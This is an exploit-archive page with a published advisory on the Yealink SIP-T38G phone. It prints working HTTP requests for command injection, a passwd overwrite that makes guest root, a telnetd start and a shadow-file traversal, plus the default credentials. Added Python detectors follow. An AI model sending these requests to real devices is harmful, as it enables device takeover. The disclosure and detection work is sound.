1337DAY-ID-22335

Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities

2014-06-14 00:00:00
Mr.Un1k0d3r
0day.today

EPSS: 0.048 (Low), percentile 92.7%

Exploit for hardware platform in category remote exploits

Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759
 
Description:
 
Because cgiServer.exx runs with root privileges, we use the command
execution (CVE-2013-5758) to relax the permissions on the system files.
Then we add extra privileges to the guest account.
 
POC:
 
Step 1 - Change the permissions of the /etc folder to 777:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("/bin/busybox%20chmod%20-R%20777%20/etc")
 
Step 2 - Change guest user uid:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd
")
 
Step 3 - Connect back over telnet using the guest account (the password is guest):
 
# id
uid=0(root) gid=0(root)
 
Enjoy your root shell :)
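The escalation above leaves a durable trace on the phone: an account other than root that carries UID 0 or GID 0. The following parser, added here as a defensive example and not part of the original advisory, flags such root aliases and shared UIDs so that /etc/passwd pulled from a fleet of devices can be checked for tampering. Both sample inputs are constructed; the tampered one is the file Step 2 writes, and the "clean" guest entry with UID/GID 501 is an assumed placeholder, since the advisory shows only the modified file.

```python
"""Audit an /etc/passwd listing for accounts that alias root.

Added defensive example (not from the original advisory). Flags non-root
accounts with UID or GID 0 and UIDs shared by several accounts.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse the seven-field passwd format; blank lines and comments are skipped."""
    entries: List[PasswdEntry] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
    return entries


def find_root_aliases(entries: List[PasswdEntry]) -> List[str]:
    """Names of accounts other than 'root' that carry UID 0 or GID 0."""
    return [e.name for e in entries if e.name != "root" and (e.uid == 0 or e.gid == 0)]


def find_duplicate_uids(entries: List[PasswdEntry]) -> Dict[int, List[str]]:
    """UIDs used by more than one account, mapped to those account names."""
    by_uid: Dict[int, List[str]] = defaultdict(list)
    for e in entries:
        by_uid[e.uid].append(e.name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def audit(text: str) -> List[str]:
    """Return human-readable alerts for one passwd listing (empty when clean)."""
    entries = parse_passwd(text)
    alerts = [f"{name} has UID/GID 0 (aliases root)" for name in find_root_aliases(entries)]
    for uid, names in find_duplicate_uids(entries).items():
        alerts.append(f"UID {uid} shared by {', '.join(names)}")
    return alerts


# Constructed sample: the file written by Step 2 of the advisory.
TAMPERED_PASSWD = """root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh
"""

# Constructed sample: an assumed untampered layout. The advisory shows only
# the modified file, so guest's UID/GID 501 is a placeholder.
CLEAN_PASSWD = """root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh
"""

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_PASSWD), ("tampered", TAMPERED_PASSWD)):
        alerts = audit(text)
        print(f"{label}: {'OK' if not alerts else '; '.join(alerts)}")
```

The check is deliberately independent of the shadow file: the escalation works by giving guest UID 0 while its password stays "guest", so a UID audit catches it even when password hashes are not available to the auditor.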
 


Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
 
Description:
 
Through cgiServer.exx we are able to send OS commands to the system
function.
 
POC:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("/bin/busybox%20telnetd%20start")

Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
 
Description:
 
The web interface contains a vulnerability that allows any page to be included.
We are able to disclose /etc/passwd and /etc/shadow.
 
POC:
Using the page parameter (CVE-2013-5756):
http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
 
Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
 
* Viewing the shadow file shows that cgiServer.exx runs with root
privileges. This leads to CVE-2013-5759.

Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755
 
Description:
 
The web interface uses hardcoded default credentials stored in /config/.htpasswd:
 
 
user:s7C9Cx.rLsWFA
admin:uoCbM.VEiKQto
var:jhl3iZAe./qXM
 
The cleartext passwords for these accounts are:
 
user:user
admin:admin
var:var
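All four issues on this page arrive through the same endpoint, so a reverse proxy or IDS in front of the phone's web interface can recognise them from the request alone. The following detector is an added example, not code from the original advisory: it parses one raw HTTP request and returns the CVE identifiers from this page whose pattern it matches (traversal in `page=`, `dumpConfigFile(` in `command=`, a `system(` call in the body or query, a redirection into /etc/passwd, and HTTP Basic credentials that decode to one of the default pairs listed above). The sample requests are constructed from the advisory's POCs; the hostname and the non-default password in the benign sample are placeholders.

```python
"""Flag HTTP requests to cgiServer.exx that match this advisory's patterns.

Added detection example (not from the original advisory). Returns the CVE ids
from the page whose pattern a single raw request matches.
"""
import base64
import binascii
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Default credential pairs listed in the advisory (CVE-2013-5755).
DEFAULT_CREDS = {"user:user", "admin:admin", "var:var"}

REASONS: Dict[str, str] = {
    "CVE-2013-5755": "Basic auth with a factory-default credential",
    "CVE-2013-5756": "directory traversal in page=",
    "CVE-2013-5757": "dumpConfigFile() via command=",
    "CVE-2013-5758": "system() call sent to cgiServer.exx",
    "CVE-2013-5759": "redirection into /etc/passwd",
}


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw request into (method, target, lowercased headers, body)."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def decode_basic_auth(value: str) -> Optional[str]:
    """Return 'user:password' for a Basic Authorization value, else None."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyse_request(raw: str) -> List[str]:
    """Return the CVE ids whose pattern the request matches (empty if none)."""
    _method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    if not url.path.endswith("/cgi-bin/cgiServer.exx"):
        return []
    findings: List[str] = []
    # parse_qs percent-decodes once; unquote again so double-encoded
    # values (%252f) are normalised before the checks run.
    params = parse_qs(url.query, keep_blank_values=True)
    if any(".." in unquote(v) for v in params.get("page", [])):
        findings.append("CVE-2013-5756")
    if any("dumpconfigfile(" in unquote(v).lower() for v in params.get("command", [])):
        findings.append("CVE-2013-5757")
    decoded = unquote(body) + "\n" + unquote(url.query)
    if "system(" in decoded:
        findings.append("CVE-2013-5758")
    if "/etc/passwd" in decoded and ">" in decoded:  # matches the Step 2 body
        findings.append("CVE-2013-5759")
    if decode_basic_auth(headers.get("authorization", "")) in DEFAULT_CREDS:
        findings.append("CVE-2013-5755")
    return findings


# Constructed samples modelled on the advisory's POCs; host is a placeholder.
HOST = "Host: phone.example.internal\r\n"
RCE_REQUEST = ("POST /cgi-bin/cgiServer.exx HTTP/1.1\r\n" + HOST +
               "Authorization: Basic YWRtaW46YWRtaW4=\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
               'system("/bin/busybox%20telnetd%20start")')
LFI_REQUEST = ("GET /cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
               " HTTP/1.1\r\n" + HOST + "\r\n")
DUMP_REQUEST = ('GET /cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow") HTTP/1.1\r\n'
                + HOST + "\r\n")
# Benign: an ordinary page load by an admin whose default password was changed.
BENIGN_REQUEST = ("GET /cgi-bin/cgiServer.exx?page=status HTTP/1.1\r\n" + HOST +
                  "Authorization: Basic "
                  + base64.b64encode(b"admin:not-the-default").decode("ascii") + "\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("rce", RCE_REQUEST), ("lfi", LFI_REQUEST),
                       ("dump", DUMP_REQUEST), ("benign", BENIGN_REQUEST)):
        hits = analyse_request(req)
        print(f"{label:6s} -> {', '.join(f'{c} ({REASONS[c]})' for c in hits) or 'no findings'}")
```

The default-credential check is the most useful one to keep running after patching: `YWRtaW46YWRtaW4=` decodes to `admin:admin`, and a Basic header that decodes to any of the three pairs above indicates a phone whose factory password was never changed, regardless of what the request body contains.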

-- 
*Mr.Un1k0d3r** or 1 #*

#  0day.today [2018-03-13]  #
